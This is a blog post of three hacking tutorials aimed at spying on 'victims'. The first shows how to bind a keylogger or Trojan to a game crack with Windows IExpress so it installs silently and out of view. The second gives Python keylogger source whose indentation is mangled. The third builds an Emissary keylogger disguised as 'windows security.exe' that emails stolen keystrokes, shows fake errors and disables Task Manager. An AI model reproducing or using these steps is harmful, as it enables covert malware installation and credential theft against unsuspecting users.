Saturday, 16 March 2013

How to Bind two .exe files Using windows


Windows in default provides Iexpress applications which have the capability to act as a free Binding application, Iexpress applications are generally used by third party application designers for creating and designing their Windows installer. Iexpress can be generally used for various purposes in this tutorial we will show how to bind two .exe files.(This tutorial can be used for binding key logger files with any games or setup files to execute in a undoubtful way. This can be used to run key logger in an silent way similarly Trojan can also be used)


STEP 1: click windows key +r key combination to open RUN dialog box and enter “IEXPRESS”(without quotes )as shown and click “OK”.














STEP 2: Select “create new self extraction directive file” and click “Next”.












STEP 3: Select “Extract files and run an installation command” then click on “Next”

STEP 4: Provide an name for your installation package (ex: Prince of Persia trainer)













STEP 5: Select “NO Prompt” and click “NEXT” and select “Do not display a license” and click “Next”

























STEP 6: From the next dialog box click “Add“ from menu and add the two .exe files to be binded (server+ application).Here I add two files POP crack +windows server(keylogger).Then click “Next”

























STEP 7: Then from the next dialog box provide which program you want to install in User view and which one in hidden (In “Install program “provide your application in “Post install command” select your key logger). click “NEXT













STEP 8: Select “Hidden” from next menu and click “Next”













STEP 9: If you want to display any message to victim you can display here but it’s not necessary everywhere. Here I leave it empty by selecting “NO MESSAGE”













STEP 10: Here enter the save location for  your file by clicking “Browse”. Also don’t forget to select  “Hide File Extracting progress Animation from User”. click “Next”













STEP 11: On Configure restart tab select “only restart if needed” and click “Next”

























STEP 12 : Now in “create Package “tab select “Next” and your package will be created at destination.


Create Keylogger Using Python 2.7

In this tutorial we will show you how to create an own keylogger to record key strokes in PC directly using Python programming. Using this method you can spy any target computer with ease.

SOFTWARE USED:
*Phython 2.7 (Python 2.7)

STEP 1: From the start menu select,” Python 2.7 > IDLE(Python GUI)”











STEP 2:  Click “File > New window”













STEP 3: Now type the below code in Phython window  as shown in fig.,

import win32api 
import sys
import pythoncom, pyHook
 
buffer = ''
def OnKeyboardEvent(event):
if event.Ascii == 5:
 
sys.exit()
 
if event.Ascii != 0 or 8:
 
f = open ('c:\\output.txt', 'a')
 
keylogs = chr(event.Ascii)
 
if event.Ascii == 13:
 
keylogs = keylogs + '\n'
 
f.write(keylogs)
 
f.close()
 
while True:
hm = pyHook.HookManager()
 
hm.KeyDown = OnKeyboardEvent
 
hm.HookKeyboard()
 
pythoncom.PumpMessages()
















STEP 4 :Save the file in C:\ as Keylogger.py and click  RUN( CTRL + R: the keylogger will come started in the background and will run until the log file "C: \ output.txt" anything that will typed on the keyboard. )


Create Key Logger To Spy Victim Using Emissary Keylogger..

In this post we will show you how to create a key logger file to hack secretly using emissary keylogger, using this we can easily create an server to import keystrokes of victim and also it can be used as a harming tool to disable Task manager, Registry edit.

SOFTWARE REQUIRED:
*Emissary key logger  (Dowload Link)

STEP 1: Extract & Open Emissary key logger Application from download.





STEP 2: Provide a Gmail ID and corresponding Password in these columns (To be safe create an fake Gmail id and use it)















STEP 3: Change the server name to anything you want with .exe extension. It should be undoubtful at any instance (ex: windows security.exe)



STEP 4 (optional): You can display any fake error messages to victim while opening the key logger file & you can make the victim automatically download any files you want


















During execution it will display dialog box as









STEP 5: Finally click on “BUILD SERVER” and your key logger server will be created at your Emissary key logger directory









Note: This keylogger file is easily detectable by antivirus so read the article how to make an Keylogger undetectable to Antivirus.